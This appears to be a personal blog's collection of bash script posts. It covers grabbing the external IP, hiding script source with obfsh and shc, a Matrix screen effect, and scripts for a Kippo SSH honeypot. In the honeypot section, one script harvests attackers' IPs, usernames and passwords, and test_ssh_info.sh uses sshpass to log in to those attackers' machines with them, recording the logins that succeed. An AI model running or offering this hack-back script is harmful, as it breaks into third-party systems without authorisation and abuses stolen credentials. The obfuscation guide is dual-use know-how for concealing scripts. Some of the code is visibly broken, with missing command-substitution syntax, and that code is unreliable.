Use
http://ifconfig.me/all/json
https://github.com/dominictarr/JSON.sh

#!/bin/bash

# Grab external IP and copy to Dropbox or other remote locations.
curl -s http://ifconfig.me/all/json | /home/seth/scripts/system/JSON.sh -b | grep -i "ip_addr" | cut -d "	" -f 2 | cut -d "\"" -f 2 > /home/seth/Dropbox/track_data/$HOSTNAME.ip

Or you can use this.

lynx -dump -hiddenlinks=ignore -nolist http://checkip.dyndns.org:8245/ | awk '{ print $4 }' | sed '/^$/d; s/^[ ]*//g; s/[ ]*$//g'

 701 total views

If you are looking to protect your BASH script from prying eyes, try encrypting it and then compiling it.

1st: Encrypting
1] obfsh – You will want this tool from http://www.comp.eonworks.com/scripts/obfuscate_shell_script-20011012.html
obfsh is quite flexible and can obfuscate any type of shell script. The
obfuscated script version is printed to stdo. The original script is not
modified.

Using obfsh options cleverly, one may fool more then just a casual intruder
or snooper, and certainly make understanding of the obfuscated script harder
and more time consuming.

Read some of the options first.

obfsh -h

You can vary the way it works.

So to encrypt it, take this tool and make your script hard to read.

obfsh -i -f script.sh > newfile_script.sh

2] ?(Another method is out there. Just have to find it again.)

2nd: Compile
Take your newly encrypted file from step 1 and use it here with the tool called shc.

Check your distro or goto http://www.datsi.fi.upm.es/~frosal/ and download shc (shc-3.8.9.tgz version of this posting).
Edit: After trying to get this to work smoothly, and failing to get “make” to work, I then tested version 3.8.7. This one ran “make” correctly and “make install”. I suggest using it instead. http://www.datsi.fi.upm.es/~frosal/sources/shc-3.8.7.tgz

Use -r, this will relax security to create a redistributable binary that executes on other systems that runs the same operating system as the one on which it was compiled.

shc -r -f newfile_script.sh

3rd (optional): Specifying Expiration Date for Your Shell Script
This makes it so the compiled bash script will not run after the set date and will display a message instead.

shc -r -e 01/01/2015 -m "Expired on New Years Day." -f newfile_script.sh

Note:
If you get the following error messages upon give the shc command:

# shc -f cleanlog.sh
cleanlog.sh.x.c:108:22: error: sys/stat.h: No such file or directory
cleanlog.sh.x.c:109:23: error: sys/types.h: No such file or directory
cleanlog.sh.x.c:111:19: error: errno.h: No such file or directory
cleanlog.sh.x.c:112:19: error: stdio.h: No such file or directory
cleanlog.sh.x.c:113:20: error: stdlib.h: No such file or directory
cleanlog.sh.x.c:114:20: error: string.h: No such file or directory
cleanlog.sh.x.c:115:18: error: time.h: No such file or directory
cleanlog.sh.x.c:116:20: error: unistd.h: No such file or directory
cleanlog.sh.x.c: In function 'key_with_file':
cleanlog.sh.x.c:178: error: array type has incomplete element type
cleanlog.sh.x.c:179: error: array type has incomplete element type
cleanlog.sh.x.c:185: warning: incompatible implicit declaration of built-in function 'memset'
.....................
.....................

then install the following packages:

# apt-get install gcc libc6-dev

Last but not the least. There is no guarantee that this utility will provide you a very strong security protection. Experienced users or hackers who have sufficient knowledge about “gdb” or other debugger tools can decrypt your shell script(when using shc alone). Although it does provide a good starting point to encrypt (hide) shell scripts from “regular” users if you are a system administrator.

 6,442 total views

BASH Matrix effects
BASH Matrix effects
matrix (1).tar.gz
1.1 KiB
545 Downloads
Details...

The paths are needing adjusted to work for your placement.
Two places to change. Number one is the matrix.sh file. You will see it below.
Number two is the matrix_char.sh file. The very first part.
Continue reading

 1,572 total views

First we log all the connection attempts to my server(Live or new Virtual Machine) using the package called Kippo – http://code.google.com/p/kippo/.


Then we create this file I called grab_ssh_info.sh(Click for latest).

#!/bin/bash

 # Run this every day at least in order to get all the entries.
 # Run this before the logrotate does its work on the kippo log(You are rotating it right?) for the day/week/month$
 # Cron could be 44 min mark every hour so when it rotates at midnight you will not lose much data.

# Start a new log.
if [ -e /root/scripts/kippo_ssh_auths.log ]; then
 rm /root/scripts/kippo_ssh_auths.log
fi

# Since I am only looking at the recent listings, only look at todays based on the date timestamp
todays_date=date +%F
# Only read todays and loop each line in the string
grep -i $todays_date /home/ris/kippo-0.5/log/kippo.log | while read -r line; do

 # Only read the lines that contain login auths and IPs. All in one line in this case.
 if [[ echo $line | grep -i "login attempt" ]]; then
  # Cut out the different parts.
  inIP=echo $line | grep -i "login attempt" | cut -d '[' -f 2 | cut -d ',' -f 3 | cut -d ']' -f 1
  inUSER=echo $line | grep -i "login attempt" | cut -d '[' -f 3 | cut -d '/' -f 1
  inPASS=echo $line | grep -i "login attempt" | cut -d '[' -f 3 | cut -d '/' -f 2 | cut -d ']' -f 1

  # Throw it all in together for outputing to a log of my own.
  output="$inIP|$inUSER|$inPASS"
  #echo $output

  # IF we do not already have it in the log, append the info to it.
  if [ ! -e /root/scripts/kippo_ssh_auths.log ]; then
   touch /root/scripts/kippo_ssh_auths.log
  fi

  grep -q "$output" /root/scripts/kippo_ssh_auths.log
  if [ $? == 1 ]; then
   echo "$inIP|$inUSER|$inPASS" >> /root/scripts/kippo_ssh_auths.log
  fi
 fi
done

Then we can use the copy of /root/kippo_ssh_auths.log log to try and connect BACK to the door knockers machine and see if the login works.
If it does, add it to a success log(if new) and go on to the next one.
If it fails, ignore it. It will be deleted when we delete the copy of the log file at the end of the script.
I call this file test_ssh_info.sh

#!/bin/bash

# This script will take mv the /root/scripts/kippo_ssh_auths.log log to /root/scripts/test_ssh_auths.log
# so we can safely work on it.

# After moving, it will go line by line and take the arguments and test them by ssh.
# If it works, the info will be written to another log, /root/scripts/valid_ssh_auths.log for any other usage.

# Suggest running at 45 min mark every hour. Right after the grab info script.

mv /root/scripts/kippo_ssh_auths.log /root/scripts/test_ssh_auths.log

# Old string seperator
oifs=$IFS
# The one we want
IFS="|"

while read line; do

 echo "Testing: $line"
 # Split the line into a array
 # Format IP|USERNAME|PASSWORD
 tmp_arr=($line)
 testip=${tmp_arr[0]}
 testuser=${tmp_arr[1]}
 testpass=${tmp_arr[2]}
# echo "$testip $testuser $testpass"

 # Use the tool sshpass to passthrough a password to ssh
 # How can I do this in parallel ?
sshpass -p "$testpass" ssh -q -o "StrictHostKeyChecking no" -l "$testuser" $testip "exit"
# sshpass -p "$testpass" ssh -o "StrictHostKeyChecking no" -l "$testuser" $testip "exit"

 testssh=$?
# echo "Return Code: $testssh"

 # sshpass will exit with code 0 if it logged in ok.
 # ?? I was testing it and had some errors using the script. It would exit with 5. If I did it manualy, it worked $
 if [ $testssh == 0 ]; then
  output="$testip|$testuser|$testpass"

  if [ ! -e /root/scripts/valid_ssh_auths.log ]; then
   touch /root/scripts/valid_ssh_auths.log
  fi

  grep -q "$output" /root/scripts/valid_ssh_auths.log
  if [ $? == 1 ]; then
   echo "$line" >> /root/scripts/valid_ssh_auths.log
   echo "Valid: $line"
  else
   echo "NOT Valid: $line"
  fi
 fi

done < /root/scripts/test_ssh_auths.log;

# Change back the String Seperator
IFS=$oifs

# Remove the log that we tested
rm /root/scripts/test_ssh_auths.log

Small script(start_kippo.sh) for cron to make sure your Kippo is still running.
I noticed that the small VPS I was running would kill Kippo once awhile because I ran out of memory(32MB) and swap(32MB). So I tested every minute to see if needed starting again.

#!/bin/bash

ps aux | grep -i twistd | grep -q -i kippo
code=$?

if [ $code == 1 ]; then
 cd  /home/ris/kippo-0.5/
 sudo -u ris  /home/ris/kippo-0.5/start.sh
 echo "Started Kippo again."
fi

Set your log rotation to cycle the Kippo log every 24 hours or my scripts will be re testing a lot of ssh connections.
Set your cron to run them whenever. I recommend just before the logrotate cycle. Just make sure it is sequenced right. Do the grab script first.

 1,373 total views

This is to gather the IP addresses and the USERNAME and PASSWORDS that were used in the attempts to login to my machines.

#!/bin/bash

 # Run this every day at least in order to get all the entries.
 # Run this before the logrotate does its work on the log for the day/week/month...

# Since I am only looking at the recent listings, only look at todays based on the date timestamp
todays_date=date +%F
# Only read todays and loop each line in the string
grep -i $todays_date /home/kris/kippo-0.5/log/kippo.log | while read -r line; do

 # Only read the lines that contain login auths and IPs. All in one line in this case.
 if [[ echo $line | grep -i "login attempt" ]]; then
  # Cut out the different parts.
  inIP=echo $line | grep -i "login attempt" | cut -d '[' -f 2 | cut -d ',' -f 3 | cut -d ']' -f 1
  inUSER=echo $line | grep -i "login attempt" | cut -d '[' -f 3 | cut -d '/' -f 1
  inPASS=echo $line | grep -i "login attempt" | cut -d '[' -f 3 | cut -d '/' -f 2 | cut -d ']' -f 1

  # Throw it all in together for outputing to a log of my own.
  output="$inIP|$inUSER|$inPASS"
  echo $output

  # IF we do not already have it in the log, append the info to it.
  if [ ! grep $output /root/kippo_ssh_auths.log ]; then
   echo "$inIP|$inUSER|$inPASS" >> /root/kippo_ssh_auths.log
  fi
 fi
done

 778 total views